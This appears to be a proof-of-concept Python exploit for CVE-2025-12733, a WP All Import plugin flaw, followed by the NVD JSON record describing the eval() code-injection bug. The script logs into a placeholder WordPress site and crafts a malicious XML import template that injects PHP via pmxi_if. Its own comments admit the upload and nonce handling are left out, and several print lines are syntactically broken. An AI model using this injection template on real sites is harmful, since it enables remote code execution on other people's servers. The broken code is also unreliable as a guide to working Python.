CVE-2025-12733

# CVE-2025-12733 WP All Import RCE PoC # Affected: WP All Import plugin <= 3.9.6 import requests import sys from bs4 import BeautifulSoup target_url = "http://target-wordpress-site.com" username = "admin" password = "password" session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } session.post(login_url, data=login_data) # Step 2: Create malicious XML template with RCE payload # The payload uses pmxi_if function to execute PHP code malicious_template = """<?xml version="1.0" encoding="UTF-8"?> <data> <item> <title>Test Item</title> <content>{pmxi_if(1,'<?php phpinfo(); ?>','0')}</content> </item> </data>""" # Step 3: Upload malicious template via WP All Import import_url = f"{target_url}/wp-admin/admin.php?page=pmxi-admin-import" files = { "file": ("malicious_template.xml", malicious_template, "text/xml") } # Note: Actual exploitation requires proper session cookies and nonce values # This PoC demonstrates the attack vector print("["]" + "="*50) print("CVE-2025-12733 WP All Import RCE PoC") print("["]" + "="*50) print("Target:", target_url) print("Payload: {pmxi_if(1,'<?php phpinfo(); ?>','0')}") print("Status: Malicious template crafted successfully") print("Note: Execute import to trigger RCE via eval()")

{"cve": {"id": "CVE-2025-12733", "sourceIdentifier": "[email protected]", "published": "2025-11-13T04:15:46.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Import any XML, CSV or Excel File to WordPress (WP All Import) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 3.9.6. This is due to the use of eval() on unsanitized user-supplied input in the pmxi_if function within helpers/functions.php. This makes it possible for authenticated attackers, with import capabilities (typically administrators), to inject and execute arbitrary PHP code on the server via crafted import templates. This can lead to remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-all-import/tags/3.9.6/helpers/functions.php#L79", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3393968%40wp-all-import&new=3393968%40wp-all-import&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8475dd90-b47a-42b4-8e4e-44e8512e4fca?source=cve", "source": "[email protected]"}]}}